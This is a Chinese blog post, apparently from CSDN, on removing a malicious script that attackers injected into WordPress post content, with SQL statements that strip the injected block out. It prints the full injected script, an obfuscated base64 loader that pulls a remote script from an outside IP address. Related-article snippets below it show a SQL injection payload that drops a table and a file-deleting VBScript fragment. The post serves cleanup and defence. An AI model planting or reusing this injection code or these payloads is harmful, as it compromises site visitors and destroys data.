MYSQL 数据库移除被注入的内容

最新推荐文章于 2022-10-09 18:08:16 发布
最新推荐文章于 2022-10-09 18:08:16 发布
阅读量951 收藏
点赞数

Wordpress 表 wp_posts, 字段 post_content。 黑客注入后

完整注入代码:

<!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="DATA:TEXT/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} <!--/codes_iframe-->

去除注入部分,执行语句前记得备份数据:

UPDATE wp_posts SET post_content = CONCAT(
  SUBSTRING(post_content, 1, LOCATE('<!--codes_iframe-->', post_content)-1),
  SUBSTRING(post_content, LOCATE('<!--/codes_iframe-->', post_content)+LENGTH('<!--/codes_iframe-->')))
  WHERE LOCATE('<!--codes_iframe-->', post_content) > 0 AND ID=1139;

## 如果要替换的内容比较简单的话,用以下sql:

UPDATE wp_posts SET post_content = REPLACE(post_content, "old content", 'new content') WHERE ID=100;

具体可以参考: https://stackoverflow.com/questions/52249409/how-to-remove-scripts-in-posts-from-an-sql-injection-attack

cebuleo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SQL删除注入数据的SQL脚本
07-03
执行此脚本,轻松删除SQL被注入的恶意数据(注意看注释)
MySQL创建数据库的两种方法
09-10
总的来说,这两种方法都是创建MySQL数据库的有效途径,选择哪一种取决于你的具体需求和环境。在生产环境中,通常推荐使用更安全、更现代的PHP数据库接口,如mysqli或PDO,同时确保遵循最佳实践,例如使用预处理语句...
删除sql注入
weixin_34310785的博客
07-21 140
三种方法:第一种针对单个表 第二种针对单个表字段太多的情况(print输出有字数限制) 第三种针对于单个库(最强模式可直接将库中所有表的所有字符串类型字段全部更新)第一种:直接导出sql语句declare @curTable varchar(500), @FilterStr varchar(500);--过滤字符串 字符串及之后的数据将被替换为空 set @FilterS...
sql注入之删除数据表
热门推荐
weixin_38972910的博客
12-27 1万+
前提:网站必须那能够被sql注入,也就是没有进行预编译操作。 最开始的数据库:   注入操作: 直接在网站登录界面进行注入   账户名随便输一个'343' 这种格式,用''引起来 然后密码输入:'456';  DROP TABLE userLogin 这种形式 最后在数据库中解析成完整语句如下: SELECT * FROM userLogin WHERE username...
0827Python总结-python操作mysql,sql注入攻击,python操作mysql增删改查,导入导出数据库
Hi文的博客
08-28 250
一.python 操作 mysql import pymysql seting -> pymysql 1.基本语法 # (1)创建连接 host user password database 这四个参数必须写 conn = pymysql.connect(host="127.0.0.1",user="root",password="123456",database="db0826",charset="utf8",port=3306) # (2)创建游标对象(该对象可以操作数据库增删改查) curso
mysql sql注入删除表_MySQL 表操作、pymysql注入攻击
weixin_36143628的博客
01-20 483
1、基础语句查select(* | 字段名 | 四则运算 | 聚合函数) from 表名称;加上as取别名 as可省略如:select name, (math+english)/2 total from stu;增insert into 表名(字段, ..) values(值, ....),(值, .....)可以从另一张表中拿数据,insert into t1(user, pwd) select...
使用mysql数据库及php技术实现的购物车效果_php查询数据库并输出
11-22
1. **MySQL数据库**:MySQL是一种广泛使用的开源关系型数据库管理系统,用于存储商品信息和购物车数据。在`shanping.sql`和`shanping_copy1.sql`文件中,可能包含了创建数据库和表的SQL脚本,例如`products`表用于...
C和C++连接MySQL数据库实现简单的学生(或职工)信息管理系统
最新发布
03-21
在本文中,我们将深入探讨如何使用C和C++编程语言连接到MySQL数据库,并实现一个简单的学生(或职工)信息管理系统。这个系统可以帮助我们存储、检索和管理学生或职工的相关信息,是初学者学习数据库操作与C/C++结合...
使用JDBC连接Mysql数据库会出现的问题总结
09-09
在使用Java JDBC连接MySQL数据库时,开发者可能会遇到各种问题,这些问题通常涉及到驱动兼容性、配置错误、编码问题等。以下是一些常见的问题及其解决方案: 1. **驱动类加载的弃用**: 在较新的MySQL版本(如...
PHP同时连接多个mysql数据库示例代码
12-18
请注意,这些示例使用了已废弃的`mysql_*`系列函数,这些函数在PHP 7.0.0版本后被移除。在新的项目中,建议使用更安全且维护良好的`mysqli`或PDO扩展来处理MySQL数据库。例如,使用`mysqli`的等效代码将是: ```php...
MySQL删除数据表
天高任鸟飞
06-11 324
删除数据表 DROP TABLE 表名;
删除SQL注入的一些方法总结
weixin_34150224的博客
07-21 354
sql替换法: declare @myStr nvarchar(500); set @myStr='oa_20121026new.bak&lt;/title&gt;&lt;style&gt;.alx2{position:absolute;clip:rect(456px,auto,auto,456px);}&lt;/style&gt;&lt;'; select replace(@myStr...
mysql select 注入,MySQL注入 – 使用SELECT查询来更新/删除
weixin_35839384的博客
03-17 274
我有一个简单的问题:说有一个网站的查询如下:SELECT id,name,message FROM messages WHERE id = $_GET [‘q’].有没有办法在数据库(MySQL)中更新/删除某些内容?到目前为止,我从未见过能够使用SELECT查询删除/更新的注入,所以,它甚至可能吗?解决方法:如果你说你使用不支持多个查询的mysql_query,你不能直接添加DELETE / U...
mysql sql注入
技术的搬运工
05-05 376
通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 举例 1:输入的用户名必须为字母、数字及下划线的组合,且用户名长度为 8 到 20 个字符之间: if (preg_match("/^\w{8,20}$/", $_GET['username'], $matches)) { $result = mysqli_que...
MySQL的安装、删库、服务的开启、删除与登录
weixin_53713452的博客
10-18 145
安装MySQL 去官网下载压缩包然后把文件夹解压到自己喜欢放的位置,比如我是放在D盘。 官网传送门 创建my.ini配置文件 [mysqld] # 设置3306端口 port=3306 [mysqld] # 设置3306端口 port=3306 # 设置mysql的安装目录 basedir=D:\MySQL\mysql-8.0.26 # 设置mysql数据库的数据的存放目录 datadir=D:\MySQL\mysql-8.0.26\data # 允许最大连...
MySQL SQL注入
冷月醉雪的博客
01-11 3415
防止SQL注入,我们需要注意以下几个要点: ·1.永远不要信任用户的输入。对用户的输入进行校验,可以通过正则表达式,或限制长度;对单引号和双"-"进行转换等。 ·2.永远不要使用动态拼装sql,可以使用参数化的sql或直接使用存储过程进行数据查询存取。 ·3.永远不要使用管理员权限的数据库连接,为每个应用使用单独的权限有限的数据库连接。 ·4.不要把机密信息直接存放,加密或hash密码和...
JDBC-操作数据库的增删改查及SQL注入说明
maohe的博客
10-09 959
JDBC-数据库增删改查操作,SQL注入问题说明。
数据库——MySQL(四)(JDBC、数据库链接、数据库增删改查、SQL注入攻击)
jin_luo的博客
03-13 442
数据持久化:(persistence)把数据保存到可电式存储设备中以供之后使用。数据持久化意味着将内存中的数据保存到硬盘上加以”固化”,而持久化的实现过程大多通过各种关系数据库来完成。可以存储在磁盘文件、XML数据文件中-----------------------------------------------------------------------------------------...
数据库被入侵了,被注入的脚步如下
都是浮云
01-09 1955
on error resume next Set fso8 = CreateObject("Scripting.FileSystemObject") Set ObjFSO2 = CreateObject("Scripting.FileSystemObject") If fso8.FileExists("C:\WINDOWS\Help\cnwb.html") Then ObjFSO2.Delete
jsp操作MySQL实现查询 插入 删除功能示例.docx
01-20
jsp操作MySQL实现查询 插入 删除功能示例.docx

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值